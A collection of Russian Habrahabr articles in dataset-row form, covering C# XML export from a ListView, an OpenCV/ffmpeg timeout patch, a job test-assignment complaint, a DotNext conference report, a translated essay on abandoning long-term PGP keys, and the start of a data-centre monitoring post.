Итак, мы бегло ознакомились с ассортиментом 3D-сканеров общего назначения стоимостью до 1500 000 рублей. Это, конечно же, ещё не всё — в ближайших обзорах мы рассмотрим специализированные 3D-сканеры применяемые в разных областях — в стоматологии, например, в ювелирном деле и инженерной разработке.
Хотите больше интересных новостей из мира 3D-технологий? Подписывайтесь на нас в соц. сетях: | https://geektimes.ru/company/top3dshop/blog/283702/ |
habrahabr | Экспорт табличных данных из приложений написанных под .NET на языке C# | ['C#', '.net', 'listview', 'таблица', 'экспорт', 'xml'] | Предыстория
Все началось с того, что стал писать простенькую программу, которая должна была выполнять функции телефонного справочника. В качестве основного компонента, в котором будут размещаться... | Предыстория
Все началось с того, что стал писать простенькую программу, которая должна была выполнять функции телефонного справочника. В качестве основного компонента, в котором будут размещаться все данные, выбрал объект класса ListView. Но любая хорошая программа должна уметь сохранять все свои данные в отдельный файл, с последующей его загрузкой, для продолжения работы с данными.
Что бы не изобретать велосипед, я принял решение о сохранение данных в XML-файл. Такой тип файла, очень удобен и популярен у многих разработчиков, с ним легко работать. Единственным его недостатком является слабая защищенность данных. Его можно открыть любым простым редактором текста, хотя и можно применить шифрование текста — это не гарантирует полной безопасности для информации в файле. Как осуществить экспорт данных?
Как видно из скриншота, в элементе меню «Файл» уже все заготовлено для Экспорта и Импорта нашей телефонной книги, осталось написать сам код.
При написании данной программы, у меня еще не было практического опыта работы с XML-файлами на языке С# под платформой .NET. Поэтому я стал искать материал на просторах интернета. Но все мои результаты поисков были не утешительные. Все найденные результаты давали очень грубый и «макаронный» код, который можно адаптировать под свои нужды. Однако, это все же не практично. Такой код не возможно легко использовать в разных проектах.
После чего я решил углубиться в саму особенность работы с XML-файлами на языке C#. Адаптивный код
Я обратил свое внимание на учебное пособие по языку С#, написанное Михаилом Фленовым, " Библия C#. 2-е издание ". В своей книге, автор часто рекомендует и настаивает на полном использовании классов. А в теме, посвященной работе с XML-файлами, что бы экспортировать и импортировать данный использует «соответствующие» методы, которые являются методами класса того объекта, с которым работает.
Такой способ очень хороший, при условии, когда мы лично пишем класс объекта, с которым будем работать. А как быть в тех случаях, когда мы использует уже готовый класс? К примеру, класс ListView или Datagridview , мы их не писали (лично), но многие из нас часто ими пользуются.
В этот момент, я понял, что нужно создавать свой класс который, я всегда смогу использовать. Так мне не нужно (в будущем) все время тратить на описывание различных параметров. Нужно лишь будет переопределить методы класса, или просто сделать правки. Класс для работы с XML Код класса для работы с XML public class Stroka
{
public void Main(string el1, string el2, string el3, string el4)
{
El1 = el1;
El2 = el2;
El3 = el3;
El4 = el4;
}
public string El1 { get; set; }
public string El2 { get; set; }
public string El3 { get; set; }
public string El4 { get; set; }
public void SaveToFile(XmlTextWriter xmlOut)
{
xmlOut.WriteStartElement("Строка");
xmlOut.WriteAttributeString("Колонка1", El1.ToString());
xmlOut.WriteAttributeString("Колонка2", El2.ToString());
xmlOut.WriteAttributeString("Колонка3", El3.ToString());
xmlOut.WriteAttributeString("Колонка4", El4.ToString());
xmlOut.WriteEndElement();
}
public void LoadFromFile(XmlTextReader xmlin)
{
try
{
El1 = xmlin.GetAttribute("Колонка1");
El2 = xmlin.GetAttribute("Колонка2");
El3 = xmlin.GetAttribute("Колонка3");
El4 = xmlin.GetAttribute("Колонка4");
}
catch(Exception)
{ }
}
}
Для работы данного класса потребуется подключить еще две сборки: using System.IO;
using System.Xml;
Класс я решил назвать " Stroka ", это потому что мы в цикле будем перебирать все строки нашей таблице. Также обратите, что во всех частях кода описывается по 4 элемента. Это сделано намеренно. Количество элементов должно совпадать с нашим количество колонок, в таблице.
Так как наш класс готов, то мы можем его свернуть в нашем проекте, и больше в него не заглядывать. Красивый экспорт (сохранение)
Давайте не будем спешить закончить нашу работу. А напишем еще несколько строчек кода, которые позволят нам вызывать диалоговое окно для сохранения.
Это окно мы сможем вызвать вот таким кодом: Код вызова окна private void экспорттелефоннойКнигиToolStripMenuItem_Click(object sender, EventArgs e)
{
int count = listView1.Items.Count;
if (count == 0)
{
MessageBox.Show("Список Пуст. Нечего экспортировать.");
return;
}
if (filename == "")
{
SaveFileDialog fileDialog = new SaveFileDialog();
fileDialog.Title = "Экспорт";
fileDialog.Filter = "XML files|*.xml";
if (fileDialog.ShowDialog() != DialogResult.OK)
return;
filename = fileDialog.FileName;
Export();
}
}
Как вы могли заметить, это уже метод экспорта данных в XML-файл. Но здесь ничего интересного не происходит, только вызывается окно для экспорта, и его путь записывается в переменную " filename ". Это обычная строковая переменная, которая создается еще в начале проекта.
Выглядит это так: Пример using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
using System.IO;
using System.Xml;
namespace TestPhoneBook
{
public partial class MainWindow : Form
{
string filename = "";
public MainWindow()
{
InitializeComponent();
}
...
Сам экспорт выполнится в методе «Export();». Время метода «Export();» Код метода Export() public void Export()
{
//создание потока записи и объекта создания xml-документа
FileStream fs = new FileStream(filename, FileMode.Create);
XmlTextWriter xmlOut = new XmlTextWriter(fs, Encoding.Unicode);
xmlOut.Formatting = Formatting.Indented;
//старт начала документа
xmlOut.WriteStartDocument();
xmlOut.WriteComment("Тестовое задание. Телефонная книга");
xmlOut.WriteComment("Работу выполнил: Григорий Чуприна");
//создание корневого документа
xmlOut.WriteStartElement("PhoneBook");
xmlOut.WriteAttributeString("Version", "1.0.0");
//цикл перебора всех элементов
int count = listView1.Items.Count;
for (int t = 0; t < count; t++)
{
ListViewItem item = listView1.Items[t];
Stroka stroka = new Stroka();
stroka.Main(item.SubItems[0].Text, item.SubItems[1].Text, item.SubItems[2].Text, item.SubItems[3].Text);
stroka.SaveToFile(xmlOut);
}
//закрытие основного тега и документа
xmlOut.WriteEndElement();
xmlOut.WriteEndDocument();
//закрытие объекта записи
xmlOut.Close();
fs.Close();
}
Важно заметить, что большая часть этого кода «шаблонна», для многих наших проектов с этим классом, единственной отличительной чертой всегда будет наш «цикл перебора всех элементов». Он будет отличаться в зависимости от того, с какой «таблицы» мы будем экспортировать данный. В данном случае, данные берутся с объекта класса ListView .
Обратите внимание на строчки: Stroka stroka = new Stroka();
stroka.Main(item.SubItems[0].Text, item.SubItems[1].Text, item.SubItems[2].Text, item.SubItems[3].Text);
Мы создаем объект класса (нашего) Stroka , и в его метод Main помещаем элементы строки (4-х наших колонок). Экспорт завершен
Созданный XML-файл я открыл программой «Блокнот», и мы можем сравнить структуру файла с нашим кодом.
Наш класс позволяет также импортировать данные, в наше приложение. Мы также сможем редактировать, и выполнять любую другую работу с ними так, как будто данные изначально были в программе.
Но об этом в другой публикации. | https://habrahabr.ru/post/317612/ |
habrahabr | OpenCV: установка таймаута на ожидание кадра в классе VideoCapture | ['с++', 'opencv', 'ffmpeg', 'timeout', 'videocapture'] | Всем доброго времени суток! Появилась тут как-то задача: воспроизвести RTSP-видеопоток с камеры. Т.к. я в достаточной мере знаком с API OpenCV, было принято решение использовать именно его. Для... | Всем доброго времени суток! Появилась тут как-то задача: воспроизвести RTSP-видеопоток с камеры. Т.к. я в достаточной мере знаком с API OpenCV, было принято решение использовать именно его. Для захвата видеопотока в OpenCV используется класс VideoCapture. К сожалению, сеть достаточно часто у нас обрывается, и проблема эта на моем уровне не решается, поэтому необходимым условием комфортной работы стала достаточно быстрая реакция на падение видеопотока — стандартный таймаут на подключение и ожидание следующего кадра составляет 30 секунд, причем внутри VideoCapture вызовы open() и read() блокирующие, что заставляет писать вокруг простого на самом-то деле кода различные обертки вроде вызова их в отдельном потоке и ожидания получения результата в асинхронном режиме. Естественно, никакой радости по этому поводу я не испытывал — все это ресурсы, которые в программе должны были уходить на иные цели, не говоря уже об усложнении кода. Было принято решение: изменить стандартный таймаут, либо добавить возможность его внешней установки. Получился достаточно грязный хак, который, впрочем, может кому-то пригодиться. Возможно, если есть способ лучше — если таковой имеется — очень бы хотелось его узнать, так что прошу комментариев. В идеале — может быть, среди читателей Хабра найдутся разработчики OpenCV, которые таки обратят внимание на данную проблему. Целью было заставить код «работать, как надо, под Windows x64».
Кому интересно — прошу под кат. Исследования
При помощи Гугла было выяснено, что данная проблема корнями упирается в ffmpeg — там есть callback'и, которые дают информацию о разрыве соединения. Таймаут в 30 секунд установили в пулл-реквесте #6053. Проблема добавилась в следующем виде: на текущий момент cmake-сборщик скачивает файл opencv_ffmpeg.dll вместо его сборки на месте, причем инструкция по сборке с ffmpeg исчезла. Код с константами таймаута (который, по крайней мере, в Windows никаким образом не компилируется) находится в файле modules/videoio/src/cap_ffmpeg_impl.hpp: #define LIBAVFORMAT_INTERRUPT_OPEN_TIMEOUT_MS 30000
#define LIBAVFORMAT_INTERRUPT_READ_TIMEOUT_MS 30000
Задача, таким образом, сформировалась следующим образом: Заставить данный файл собираться под Windows;
Изменить в нем константы;
Убедиться в отсутствии проблем при работе.
Недолго думая, расскажу о том, каким образом она была решена. Для начала нужно скачать последнюю девелоперскую версию ffmpeg с заголовочными файлами, dll, и lib, и положить все это по нужным местам в source/3rdparty — ради удобства, на самом деле можно сложить куда угодно. Далее, нужно внести следующие изменения в исходные файлы OpenCV: modules/videoio/src/cap_ffmpeg.cpp:
Закомментировать в инклудах строки, касающиеся потенциального включения cap_ffmpeg_api.hpp //#if defined HAVE_FFMPEG && !defined WIN32
#include "cap_ffmpeg_impl.hpp"
//#else
//#include "cap_ffmpeg_api.hpp"
//#endif
В функции icvInitFFMPEG() ...
#ifdef WIN32...
//все закомментировать, включая директивы препроцессора
#elif defined HAVE_FFMPEG
//оставить только то, что есть внутри
#endif
...
Что здесь произошло — мы отказались от использования подгрузки функциональности ffmpeg из opencv_ffmpeg.dll при помощи LoadLibrary, и переключились на внутреннюю реализацию, которая находится внутри файла cap_ffmpeg_impl.hpp. modules/videoio/src/cap_ffmpeg_impl.hpp:
Находим вышеуказанные константы, меняем их на желаемые. В моем случае — #define LIBAVFORMAT_INTERRUPT_OPEN_TIMEOUT_MS 2000
#define LIBAVFORMAT_INTERRUPT_READ_TIMEOUT_MS 1000
Данный файл в общем-то не создан для сборки под Windows, поэтому, кое-какая функциональность, требуемая для его компиляции, в ней отсутствует — речь идет о snprintf. Код был стянут откуда-то с StackOverflow. Вставить в любое удобное место. #if defined(_MSC_VER) && _MSC_VER < 1900
#define snprintf c99_snprintf
#define vsnprintf c99_vsnprintf
__inline int c99_vsnprintf(char *outBuf, size_t size, const char *format, va_list ap)
{
int count = -1;
if (size != 0)
count = _vsnprintf_s(outBuf, size, _TRUNCATE, format, ap);
if (count == -1)
count = _vscprintf(format, ap);
return count;
}
__inline int c99_snprintf(char *outBuf, size_t size, const char *format, ...)
{
int count;
va_list ap;
va_start(ap, format);
count = c99_vsnprintf(outBuf, size, format, ap);
va_end(ap);
return count;
}
#endif
После внесения изменений, нужно заставить все это добро компилироваться. Для начала, нужно сгенерировать *.sln для OpenCV при помощи CMake. Попытка сборки opencv_videoio на текущий момент не сработает. Поправимо. Открываем Visual Studio-проект для модуля videoio: build/modules/videoio/opencv_videoio.sln. В include directories добавляем заголовочные файлы ffmpeg, его *.lib добавляем к линковке.
Как только opencv_videoio будет собираться, эту dll можно спокойно подкладывать вместо «стандартной». Помним, что теперь для работы также будут нужны все dll из поставки ffmpeg — без них приложение работать не будет.
Важный момент: теперь, для того, чтобы это работало, в качестве бэкэнда VideoCapture необходимо указывать cv::CAP_FFMPEG.
Результат на текущий момент — полет нормальный, багов за месяц не заметил. Однако, учитывая все вышенаписанное, они более, чем возможны, поэтому использовать только на свой страх и риск. Если есть иные способы добиться желаемого, как уже говорил, буду очень рад послушать.
Спасибо за внимание. | https://habrahabr.ru/post/317624/ |
habrahabr | Тестовое задание как средство сбора идей | ['разработка игр', 'работа', 'тестовое задание', 'трудоустройство в it'] | В данный момент доступно несколько компаний разного калибра, которые занимаются мобильными и другими играми. Всем требуется разработчики высокого класса, которые хорошо разбираются в движкам,... | В данный момент доступно несколько компаний разного калибра, которые занимаются мобильными и другими играми. Всем требуется разработчики высокого класса, которые хорошо разбираются в движкам, языках, графике и в сопутствующих технологиях. И это не случайно — просто так никого не берут. Если кандидат студент, то максимум можно расчитывать на тестировщика и то, с n в 20 степени попытки.
Кому интересно настоящее положение дел — прошу под кат.
Описанное ниже не является истиной последней инстанции, но основано на личном опыте и взгляде. Итак у каждого программиста есть период улучшение рабочей обстановки, задач и заняться задачами, которые действительно интересны.
Фактически все отправленные письма и запросы в 90% случаев игнорируется или просто попадают в спам. Увеличить свои шансы можно, если обратиться по другим контактам доступным на официальном сайте или найденных в сети. Но это также повышает шансы на внутренний бан и полный игнор.
Итак, имеем разработчика мобильных игр NoName. Под этим именем подразумевается конкретная фирма, смысла упоминать ее нет. Делаем запрос по вакансии, получаем ответ в течение 1 часа — n дней, причем у некоторых n равно бесконечности. Интересно, что получив ответ практически сразу, дальнейший контакт становится уже более длительный. Получаем в итоге приветствие в виде ответа HR и предложение выполнить тестовое задание. Если делать все по-быстрому, это будет выглядеть как поделка на коленке и не произведет должного эффекта. Поэтому выделить 1-2 часа будет не достаточно. Приходится тратить время на выполнение задание 5+ часов. Но так и должно быть, что то же должно выделять кандидата одного от другого и показать конкретные знания и умения.
В итоге получаем тестовое задание с описанием плюс-минус по сложности от разных источников. Самое интересное, что нет условий, чтобы графика была супер, анимации и стерео звук с фоновой музыкой. Все довольно примитивно — достаточно кружочка, палочки и разных цветов. Можно использовать ООП, а можно не использовать. Стиль не важно и особых требований к коду, к его оформлению также нет как правило. Все просто — взял студию создал проект, накидал кода, собрал и отправил без лишних телодвижений. Но на деле совсем получается другое.
Особых требований не было и было решено использовать SDL2, чтобы можно было собрать отличной от XCode \ OSX среде. Было потрачено время около 8-ти часов, часть из них это запись видео, скриншоты и поиск ресурсов. Спасибо гуглу за любезно предоставленные ресурсы в поисковике. Тестовое задание уходит безвозвратно и требует около недели на рассмотрение. Даже если приложить скриншоты, видео и описание. Проходит 2 дня и на вопрос о статусе, оказывается его еще не доставили тому, кто должен посмотреть. Ок, 2 дня потрачено в пустую и результат еще 7 дней «на посмотреть».
Результат не заставил себя ждать и выдержав 5 дней был отправлен запрос о статусе. Оказалось, что уже посмотрели, но как то не отписались. Не подходит. Т.е. время разработчика, который потратил несколько часов своей жизни на задание полностью обесценивается, я считаю что должно найтись 10 минут от ревьювера, чтобы отписаться что же все-таки не так. Возможно нужно доработать или просто все очень плохо, но разработчик должен об это знать.
Это не означает, что NoName плохие. Вывод напрашивается только один — идет сбор идей. Что-то вроде: пиши еще друг, все ок. И они не одни такие, иначе как не объяснить причину и проблемы кандидата. Может он действительно хорошо или где-то действительно сделал все очень плохо. Я думаю, что должен быть ответ и больше 2-х строк. Пару картинок
Ниже можно посмотреть, что в итоге получилось и посмотреть исходники на github. Возможно у кого-то будет желание посмотреть, что получилось в итоге. Видео демка
→ github.com/antondevs/tanks
Насколько оправдано доводить тестовое задание до идеала? | https://habrahabr.ru/post/317610/ |
habrahabr | DotNext — Moscow 2016. Как это было | ['dotnext dotext-moscow .net c# f#'] |
Впервые я побывал на «Дотнексте» летом этого года в Питере. Тогда меня привлекли имена Дино Эспозито и Саши Гольдштейна в списке докладчиков. По книге Дино я когда-то давно осваивал ASP.NET.... |
Впервые я побывал на «Дотнексте» летом этого года в Питере . Тогда меня привлекли имена Дино Эспозито и Саши Гольдштейна в списке докладчиков. По книге Дино я когда-то давно осваивал ASP.NET. Pro .NET Performance не читал, но отзывы слышал лишь позитивные. Никогда не считал performance своей сильной стороной, а необходимость сталкиваться по работе с оптимизацией производительности стала возникать довольно часто. Вдобавок, на тот момент у меня были смешанные чувства по отношению к .NET Core. Хотелось узнать, что думают другие по этому поводу. Решающим фактором, конечно же, стало желание девушки съездить в Питер на пару деньков. Мы поехали и не пожалели:)
С Москвой все было сложнее – этот город я недолюбливаю примерно так-же, как зиму в России. Чашу весов на этот раз сдвинули доклады C++ через C# , Моя жизнь с актерами , Squeezing the Hardware to Make Performance Juice и присутствие на конференции сотрудника Stack Overflow . Каждый из них был интересен в практическом плане, так что поездка предстояла не увеселительная, а рабочая. Открывал конференцию Дино Эспозито и на этот доклад я опоздал. Во-первых, с лета мало чего принципиально поменялось в ASP.NET Core и еще тогда Дино четко обозначил свое мнение на три года вперед. Во-вторых, я слежу за .NET Core с пятой беты. Отсутствие SignalR можно пережить, воткнув для соответствующих целей socket.io . А вот EF7 все-еще сыроват.
Ознакомившись с видео-записью, я понял, что ничего не потерял. Стоит отметить, что для тех, кто не следит за развитием .NET Core доклад мог быть полезен, потому что в событиях периода RC1-RC2 действительно можно было потеряться. Дальше я пошел в четвертый зал , потому что портирование плюсов на C# — задача для меня актуальная. Доклад Егора заставил по настоящему зауважать разработчиков Mono за то, какую не тривиальную работу они проделали, не смотря на то, что традиционно Mono принято ругать и хулить, потому что «там баги» и вообще «все криво» и не тот «level of quality», что в Microsoft. В докладе была затронута тема предотвращения утечек памяти при взаимодействии из C# с плюсовым кодом. Если слайды, начиная с 25го не вызывают у вас вопросов, вы знаете про внутреннее устройство .NET гораздо больше меня. В дискуссионной зоне удалось пообщаться про HoloLens.
Заказывать предварительную версию поиграться – жаба душит, а у Егора девайс есть. Я расспросил о деталях работы с «линзами». Не уверен, будет ли коммерческое применение устройству, кроме как в визуализации интерьеров. Очень бы хотелось, потому что игрушка прикольная. После перерыва мне пришлось выбирать между akka.net и Stack Overflow. Желание обменяться опытом и расспросить конкретные факты и цифры про akka.net победило и я остался в четвертом зале. В итоге укрепился во мнении, что пора учить F#. Во-первых, функциональная парадигма выглядит лучше для event-driven систем. Во вторых, строки кода – это то, с чем я активно борюсь в последнее время, потому что кода слишком много.
Статистика Вагифа на слайде 83 далеко не в пользу C#. Хорошей новостью для меня стало, что persistent-actors вполне себя работают. Мы с момента беты не рисковали связываться. Уже за рамками доклада в дискуссионной обсудили перспективы akka streams . В России «Аккой» занимается не так много людей, поэтому обмен опытом был крайне полезным. Стоит отдельно отметить, что этот доклад был однозначно самым «творческим». Около трех минут заняло исполнение песни, посвященной акторной системе. По-моему свежо:) Следующий доклад меня, к сожалению, разочаровал. Показалось, что времени охватить многопоточнось с уровня процессора до .NET Framework, просто не хватило. Информации и цифр было много, но в итоге осталось ощущение недосказанности: что делать с этой информацией, на что обращать внимание, с какими проблемами можно столкнуться в «реальном мире»? Возможно, я просто стал заложником своих ожиданий. Не смотря на общее ощущение понравилась часть, посвященная ключевому слову lock. Деталей реализации (слайд 37) , озвученных Гаелем, мне не попадалось на глаза в интернете/литературе. Всегда казалось, что lock просто сразу переходит к шагу 3: «Create kernel event and wait». Зато доклад Карлена , наоборот, оказался неожиданно ярким. Возможно, этому способствовала особая манера изложения спикера. Я не фанат разглядывания ассемблерных листингов. Здорово, что кто-то может за тебя замерить производительность разных методов .NET и объяснить почему происходит именно так, а не иначе. Принято считать, что виртуальные методы – медленные. Карлен очень доходчиво продемонстрировал, что это не так. Посмотрите слайд №37 , спорим, удивитесь! Вообще было много деталей про отличие классов от интерфейсов, реализации дженериков. Информация Карлена крайне полезна разработчикам библиотек. Дальше – лучше . История о том, как Stack Overflow разрабатывала поиск по тегам – просто шедевр. Удалось осветить в одном докладе темы оптимизации БД, full text search, неожиданные детали GC, особенности параллелизации и работу с CUDA. И все это на реальном примере сайта, которым мы пользуемся чуть ли не ежедневно. Для меня – это, однозначно, лучший доклад на конференции. В слайдах есть ссылки. Информация доклада доступна в блоге Марка Гравелла . Всем, кому нужен поиск в больших БД – абсолютный must read. К концу конференции я стал уставать от обилия низкоуровневых деталей. Доклад Гольдштейна тоже не оказался простым. Казалось бы SIMD – это больше для геймдева и физики, математики. Но опыт Stack Overflow подсказывал, что может быть по-всякому. В любом случае, просто знание этой информации, может очень сильно помочь в принятии верных технологических решений. Один мой знакомый, занимается робототехникой. Большая часть софта – на плюсах по причинам производительности. Когда они начинали никто всерьез не рассматривал Java или C# в качестве платформы. Раньше я разделял такую точку зрения. Доклады Марко и Саши заставляют задуматься а так ли это на самом деле? Финальный доклад я тоже почти целиком пропустил, потому что общался с представителями RavenDB. Решил, что нужно обязательно посмотреть запись их спича: судя по всему, ребята проделали большую работу в четвертой версии.
Понравилась идея map/reduce-репликаций в реляционное хранилище. RavenDB 4 еще в альфе, конечно, и в продакшн использовать рано. Но, если все действительно так хорошо, как говорят разработчики, то RavenDB сейчас – одна из наиболее привлекательных БД для рефакторинга legacy .NET-систем на NoSQL-хранилище (там где это действительно нужно, конечно). Резюме
Описывать стенды спонсоров и обед мне не интересно. Спонсоры – предлагали работать у них или рассказывали о своих продуктах. Обед был без очередей и задержек – все четко.
Так как поездка была рабочей, оцениваю я ее в ценности полученной информации. Не смотря на высокую стоимость участия, думаю, что ездить нужно. В первую очередь, потому что можно задать интересующие тебя вопросы и узнать про самое новое и передовое.
Кстати, в этот раз мне пришла в голову мысль: есть проблема, не с конференцией, а публикой, с сообществом. Некоторые доклады были на столько специфичными, что находилось всего несколько смельчаков с вопросами. У какого числа программистов в России есть доступ к самым новым процессорам и возможность проверить, побенчмаркать разные архитектуры? Вот тупит branch prediction в маленьких циклах на Haswell, а на Ivy Bridge – нет. Кто действительно полезет переписывать алгоритмы, чтобы вставить в них SIMD?
Если лет пять назад я считал, что нет широкого рынка таких задач, то сейчас ситуация меняется. Ежегодный взрывной рост частоты процессоров и наращивание ядер закончились, memory bandwidth никто не отменял, а значит, скоро придется снова оптимизировать алгоритмы и выжимать из железа максимум. А чтобы знать как оптимизировать, учиться нужно уже сейчас. | https://habrahabr.ru/post/317620/ |
habrahabr | Я отказался от PGP | ['PGP', 'GnuPG', 'gpg', 'криптография', 'Signal', 'WhatsApp', 'защита коммуникаций', 'шифрование', 'OTR', 'Pond', 'Ricochet', 'Operational PGP'] | Об авторе: Филиппо Валсорда занимается криптографией и TLS, называет себя «послом urandom», входит в криптогруппу компании Cloudflare, поднял известный сервис для тестирования на уязвимость... | Об авторе: Филиппо Валсорда занимается криптографией и TLS, называет себя «послом urandom», входит в криптогруппу компании Cloudflare, поднял известный сервис для тестирования на уязвимость Heartbleed. Вы могли встречать его на конференциях по криптографии и компьютерной безопасности или под ником @FiloSottile на Github и в твиттере Спустя годы мучений с GnuPG с различным уровнем энтузиазма я пришёл к выводу, что оно не стоит того, и я сдаюсь. По крайней мере относительно концепции долговременных ключей PGP.
Речь не о самой программе gpg и не о криптографических инструментах в принципе. Многие писали на эту тему. Я говорю о модели долговременных ключей PGP, будь она гарантирована сетью доверия , отпечатками открытых ключей или моделью TOFU — неважно. Я говорю о том, что она не подходит для меня лично. Если вы получили ссылку на эту статью в ответ на своё зашифрованное письмо или в ответ на просьбу открытого ключа, то можете сразу переходить к разделу «Что дальше».
Поверьте, я пытался. Я прошёл через всё. Пробовал Enigmail. У меня были офлайновые мастер-ключи на выделенном Raspberry Pi с краткосрочными подключами. Я написал специальные программы для изготовления рукописных резервных копий офлайновых ключей на бумаге (которые я опубликую рано или поздно). У меня были аппаратные ключи YubiKey. Целые дни у меня ушли на разработку правил использования открытых ключей PGP.
Я потратил два часа на поездку поездом к ближайшему пользователю Biglumber в Италии, чтобы получить первую подпись в прочном наборе. У меня есть подпись от самого связанного ключа в наборе. Я ходил на вечеринки по обмену подписями ключей на нескольких континентах. Я даже организовал пару таких.
Я даже имел наглость говорить, что понимаю PGP. В 2013 году я препарировал пакетный формат, чтобы сбрутить короткие идентификаторы . Я изобрёл по-нездоровому сложные системы, чтобы подключ устройства привязывался одновременно к моему личному мастер-ключу и к корпоративному мастер-ключу. Я составлял тикеты по проблемам юзабилити и безопасности GnuPG и его различных дистрибутивов.
По всем признакам, я должен быть идеальным пользователем PGP. Компетентный энтузиаст, окружённый сообществом таких же единомышленников. Но это просто не работало.
Во-первых, никуда не исчезла проблема малопопулярности шифрования, о которой другие много говорили. Я получал максимум два зашифрованных письма в год.
Затем, проблема неудобства. Легко допустимые критические ошибки. Путаные листинги серверов с ключами многолетней давности. «Я не могу прочитать это письмо на своём телефоне». «Или на ноутбуке, я оставил ключи, которые никода не использую, на другой машине».
Но настоящие проблемы, которые я увидел, гораздо более тонкие. Я никогда не чувствовал, что мои долговременные ключи находятся в безопасности. Чем больше проходило времени, тем меньше была уверенность в каждом конкретном из них. Ключи YubiKey могут перехватить в номере гостиницы. Офлайновые ключи могут остаться в далёкой шуфлядке или сейфе. Могут объявить о новых уязвимостях. К USB-устройствам могут подключиться.
Безопасность долговременных ключей соответствует минимальному общему делителю ваших действий в области безопасности на протяжении всей жизни. Это слабое звено.
Что ещё хуже, существующие практики обращения с долговременными ключами, такие как сбор подписей ключей и печать отпечатков открытых ключей на визитных карточках, противоречат другим шаблонам поведения, которые в ином случае считались бы очевидной гигиенической рутиной: часто менять ключи, иметь различные ключи на разных устройствах, применять компартментализацию (разные профили мышления в разных областях, например, на работе и дома — прим.пер. ). Существующие практики обращения с долговременными ключами на самом деле расширяют вектор атаки, поскольку подталкивают делать резервные копии ключей.
Мы говорим об игре кошки с мышкой в инфраструктуре, но эта концепция также относится и к ключам! Если я подозреваю взлом, то хочу быть в состоянии бросить ноутбук и начать с нуля с минимальными потерями. Худший возможный исход — это привязать пользователя к ключу, который он считает потенциально скомпрометированным, потому что цена замены ключа слишком высока.
И всё это ради чего?
«Конечно, ради долговременного доверия».
Да, и об этом. Я ещё никогда, ни разу, не использовал сеть доверия для валидации публичного ключа. И помните, у меня хорошо связанный ключ. Я не проводил формального исследования, но почти уверен, что каждый, кто использовал PGP для связи со мной, сделал или мог бы сделать (если попросят) одну из следующих вещей: вытянул наиболее приглянувшийся ключ с сервера ключей, скорее всего даже не по TLS;
использует другой ключ, если ответить ему со словами «это мой новый ключ»;
перешлёт письмо в открытом виде, если попросить его с отговоркой вроде «я в поездке».
Поездки и путешествия особенно враждебны к долговременным ключам, делая невозможным такой тип старта с чистого листа .
Более того, я даже не уверен, что существует злоумышленник, против которого долговременные ключи имеют смысл. Ваш обычный средний враг вероятно не сможет провести MitM-атаку на личные сообщения в твиттере (это означает, что вы можете оппортунистически использовать личные сообщения для обмена отпечатками открытых ключей, всё ещё сохраняя приватность). Моссад сделает моссадовские вещи с вашей машиной, какой бы ключ вы ни использовали.
В конце концов, в наше время я больше забочусь о прямой секретности, возможности отказа и эфемерности, чем о нерушимом доверии. Вы уверены, что можете защищать долговременный ключ вечно? Потому что когда злоумышленник решит сделать вас своей мишенью и добьётся успеха, он получит доступ не только ко всем вашим сообщениям с этого момента, но ко всем прошлым сообщениям тоже. Что дальше
Я не опущусь до текстовых писем. Совсем наоборот. Но больше я не буду охранять свой долговременный ключ.
В основном, я буду использовать Signal или WhatsApp, которые предлагают значительно лучшую защиту конечных точек под iOS, эфемерность и безболезненную ротацию ключей. Если вы хотите безопаснос связаться со мной, лучше всего спросить через личное сообщение в твиттере мой номер Signal. Если необходимо, мы можем определить подходящий способ сравнить отпечатки.
Если мы встречаемся лично и потребуется установить защищённый канал, мы просто обменяемся секретной парольной фразой для использования в наиболее подходящей программе: OTR, Pond, Ricochet.
Если окажется, что нам действительно нужен PGP, мы установим какие-нибудь подходящие ключи, скорее в стиле Operational PGP . То же самое для любых подписанных релизов или canaries, которые я могу поддерживать в будущем.
Для обмена файлами используем Magic Wormhole, OnionShare или подходящие ключи PGP через защищённый канал, который у нас уже есть. Здесь цель избежать использования не gpg , а модели управления ключами PGP.
Если вам действительно нужно быстро отправить мне сообщение, я могу сохранить ключ Keybase , но не обещаю. Мне нравится больше укоренять доверие в ваших социальных профилях, потому что так ротация ключей происходит более естественным образом. И в любом случае, это вероятно тот способ, которым большинство будет связываться со мной.
Я также не отказываюсь от аппаратных ключей YubiKey. Мне очень нравится мой новый YubiKey 4 с датчиком прикосновения пальца, который я использую для хранения ключей SSH, паролей и начальной загрузки машины. Но эти вещи на 100% под моим контролем. О моих старых ключах и переходе
Я сломал защиту на всех офлайновых хранилищах моих ключей. У меня нет причин думать, что они скомпрометированы, но вам следует прекратить использовать их прямо сейчас.
Ниже приложены подписи для Markdown-версии этого документа (статья "Giving up on PGP") со всех ключей, которые я пока ещё могу найти.
В ближайшие недели я импортирую все полученные подписи, сделаю все подписи, которые обещал, а затем сделаю отзывы на серверах ключей. Я поменяю мой ключ Keybase. В концов концов, я уничтожу секретные ключи.
Увидимся в Signal. (Или в твиттере ). Giving up on PGP.md Giving up on PGP.md.B8CC58C51CAEA963.asc Giving up on PGP.md.C5C92C16AB6572C2.asc Giving up on PGP.md.54D93CBC8AA84B5A.asc
Giving up on PGP.md.EBF01804BCF05F6B.asc [будет, когда я восстановлю парольную фразу из другой страны] Примечание. Я планирую со временем расширить раздел «Что дальше», ведь инструменты появляются и исчезают. Подписанный файл .md не изменится, неподписанный .diff появится ниже для удобства верификации. | https://habrahabr.ru/post/317630/ |
habrahabr | Несколько советов по автоматизации мониторинга ЦОД. Часть 1 | ['дата-центры', 'автоматизация', 'мониторинг цод', 'внедрение системы мониторинга'] |
Мониторинг инфраструктуры дата-центра — непростая задача. Часто для ее упрощения используется автоматизация. Ну а что — отлично же, получать себе на монитор все уведомления системы мониторинга.... |
Мониторинг инфраструктуры дата-центра — непростая задача. Часто для ее упрощения используется автоматизация. Ну а что — отлично же, получать себе на монитор все уведомления системы мониторинга. Как-то мы уже писали, что автоматизация всего и вся — это неплохо. Это достаточно сложная, но решаемая задача. Зачем ее вообще решать, автоматизируя обнаружение новых устройств, соединений, программного обеспечения, создавая сценарии ответных действий системы на появляющиеся триггеры?
